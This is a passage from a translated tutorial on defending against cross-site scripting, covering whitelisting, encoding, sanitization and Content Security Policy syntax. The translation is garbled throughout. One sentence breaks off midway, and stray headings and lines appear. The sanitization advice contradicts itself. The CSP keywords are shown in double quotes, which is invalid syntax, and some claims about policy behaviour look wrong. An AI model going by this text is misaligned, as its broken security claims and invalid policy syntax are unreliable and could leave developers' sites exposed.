Deprecation Even if a perfect blacklist were developed, it would be useless if a new feature added to the browser could be used for attack. For example, if an HTML validation blacklist was developed before the onmousewheel attribute was introduced in HTML5, it would not be able to stop an attacker from using this attribute to perform an XSS attack. This disadvantage is especially important in web development, which consists of many different technologies that are constantly updated.

Because of these shortcomings, blacklisting is strongly discouraged as a classification strategy. Whitelisting is generally a much safer approach, which we'll describe next. White list White list is essentially the opposite of a blacklist: instead of identifying a prohibited pattern, the whitelist approach identifies an allowed pattern and marks the input as invalid if it

In contrast to blacklists, an example of whitelists would be to allow users to submit custom URLs containing only the http: and https: protocols, nothing more. This approach would allow a URL to be automatically marked as invalid if it contains the javascript: protocol, even if it is represented as "Javascript:" or "javascript:".

Compared to a blacklist, whitelists have two main advantages:

Simplicity Accurately describing the set of benign strings is usually much easier than identifying the set of all malicious strings. This is especially applicable in general situations where user input must include a very limited set of functionality available in the browser. For example, the whitelist described above very simply allows URLs to be used only with the HTTP: or https: protocols allowed, and in most situations this is quite enough for users.

Durability Unlike a blacklist, a whitelist typically does not become obsolete when a new feature is added to the browser. For example, HTML whitelist validation allows only the title attributes of HTML elements to remain safe, even if it (the whitelist) was designed before the introduction of the HTML5 onmousewheel attribute.

Validation result

When user input has been marked as invalid (forbidden), one of two actions can be taken:

Rejecting input is simply rejected, preventing it from being used elsewhere on the site.

If you decide to implement disinfection, you need to ensure that the disinfection procedure itself does not use a blacklist approach. For example, the URL "Javascript:...", even if identified using a whitelist as invalid, would receive a sanitization bypass routine that simply removes all instances of "javascript:". For this reason, well-tested libraries and frameworks should use sanitization whenever possible.

What methods should be used for prevention?

Encoding should be your first line of defense against XSS attacks, its purpose is to process data in such a way that the browser cannot interpret user input as code. In some cases, coding must be complemented by validation. Encoding and validation must be applied to outgoing traffic because only then can you know in what context the user input will be applied and what encoding and validation needs to be applied.

As a second line of defense, you should apply incoming data sanitization or rejection of clearly invalid user input, such as links, using the javascript: protocol. This cannot by itself provide complete security, but it is a useful precaution if any point in the coding and validation protection could fail due to incorrect execution.

If these two lines of defense are used consistently, your site will be protected from XSS attacks. However, due to the complexity of creating and maintaining a website, providing complete security using only secure user input processing can be difficult. As a third line of defense, you should use Content Security Policies ( English Content Security Policy), then CSP, which we will describe below.

Content Security Policies (CSP)

Using only secure user input handling to protect against XSS attacks is not enough because even one security mistake can compromise your website. Adopting Content Security Policies (CSPs) from the new web standard can reduce this risk.

CSPs are used to restrict a browser's use of a web page so that it can only use resources downloaded from trusted sources. A resources are scripts, style sheets, images, or some other type of file that is referenced on a page. This means that even if an attacker manages to inject malicious content into your site, the CSP will be able to prevent it from being executed.

CSP can be used to enforce the following rules:

Banning Untrusted Sources External resources can only be downloaded from a set of clearly defined trusted sources.

By disallowing embedded resources, inline JavaScript and CSS will not be taken into account.

Disabling eval prohibits the use of the eval function in JavaScript.

Last comment:

CSP in action

In the following example, an attacker managed to inject malicious code into a web page:

With a correctly defined CSP policy, the browser cannot download and execute malicious-script.js because http://attacker/ is not specified as a trusted source. Even though the site failed to reliably process user input in this case, the CSP's policy prevented the vulnerability from causing any harm.

Even if the attacker injected code inside the script code rather than a link to an external file, a properly configured CSP policy will also prevent injection into the JavaScript code, preventing vulnerability and causing any harm.

How to enable CSP?

By default, browsers do not use CSP. In order to enable SCP on your website, pages must contain an additional HTTP header: Content‑Security‑Policy. Any page containing this header will enforce security policies when loaded by the browser, provided the browser supports CSP.

Because the security policy is sent with every HTTP response, it is possible for the server to set the policy individually for each page. The same policy can be applied to the entire website by inserting the same CSP header in every response.

The value in the Content‑Security‑Policy header contains a string that defines one or more security policies that will run on your site. The syntax of this line will be described below.

The heading examples in this section use line breaks and indentations for ease of reference; they should not appear in the actual title.

CSP Syntax
The CSP header syntax is as follows: Content-Security-Policy:, Content-Security-Policy:, ...;
The CSP header syntax is as follows: ...;
...

directive

source-expression
Source expressions are a model that describes one or more servers from which resources can be loaded.

For each directive, the data in the source expression specifies which sources can be used to load resources of the corresponding type.

Directives

The following directives can be used in the CSP header:

connect-src
font-src
frame-src
img-src
media-src
object‑src
script-src
style-src

In addition to this, the special default-src directive can be used to provide a default value for all directives that were not included in the header.

Source expression

The syntax for creating a source expression is as follows:

protocol:// hostname: port number

The hostname can start with *, meaning that any subdomain of the provided hostname will be resolved. Similarly, the port number can be represented as *, which means that all ports will be allowed. Additionally, the protocol and port number may be omitted. If no protocol is specified, the policy will require that all resources be loaded using HTTPS.

In addition to the above syntax, the source expression can alternatively be one of four keywords with a special meaning (quotes included):

"none" disables resources.

"self" allows resources from the host on which the web page is located.

"unsafe‑inline" resolves resources contained on the page as inline elements, elements, and javascript: URLs.

CSP Syntax
"unsafe-eval" enables the JavaScript function eval .
Please note that whenever CSP is used, built-in resources and eval are automatically disabled by default. Using "unsafe-inline" and "unsafe-eval" is the only way to use them.
Example Policy
script‑src "self" scripts.example.com;

media‑src "none";

img‑src *;
default‑src "self" http://*.example.com
With this example policy, the web page will have the following restrictions:
Scripts can only be downloaded from the host on which the web page is located and from this address: scripts.example.com.

Audio and video files are prohibited from downloading.

As of June 2013, Content Security Policies are recommended by the W3C consortium. CSP is implemented by browser developers, but some parts of it are specific to different browsers. For example, HTTP header usage may differ between browsers. Before using CSP, consult the documentation of the browsers you plan to support.

Summary Summary: XSS Overview

An XSS attack is a code injection attack made possible by insecure processing of user input.
A successful XSS attack allows the attacker to execute malicious JavaScript in the victim's browser.
A successful XSS attack compromises the security of both the website and its users.

Summary: XSS attacks

There are three main types of XSS attacks:
- Stored XSS, where malicious input originates from the website's database.
- Reflected XSS, where malicious input originates from the victim's request.
- XSS attacks in the DOM, where the vulnerability is exploited in code on the client side, and not on the server side.
All of these attacks are performed differently, but have the same effect if successful.

Summary: Preventing XSS

The most important way to prevent XSS attacks is to perform secure input processing.
- Encoding must be done whenever user input is enabled on the page.
- In some cases, coding must be replaced or supplemented by validation.
- Secure input handling must take into account what page context the user input is being inserted into.
- In order to prevent all types of XSS attacks, secure input processing must be done in both client-side and server-side code.
Content Security Policies (CSP) provide an additional layer of protection in the event that secure input processing contains an error.

Appendix Terminology

It should be noted that there is a crossover in the terminology used to describe XSS: an XSS attack in the DOM can be either stored or reflected; These are not separate types of attacks. There is no generally accepted terminology that covers all types of XSS without confusion. Regardless of the terminology used to describe XSS, the most important thing is to determine the type of attack, this is possible if you know where the malicious input is coming from and where the vulnerability is located.

Rights of use and links

The source code for Excess XSS is available on GitHub.

Excess XSS was created in 2013 as part of the Language-Based Security course at Chalmers University of Technology.

Translation into Russian was carried out by A888R, original text in English: excess-xss.com, comments, suggestions and errors in translation should be sent here.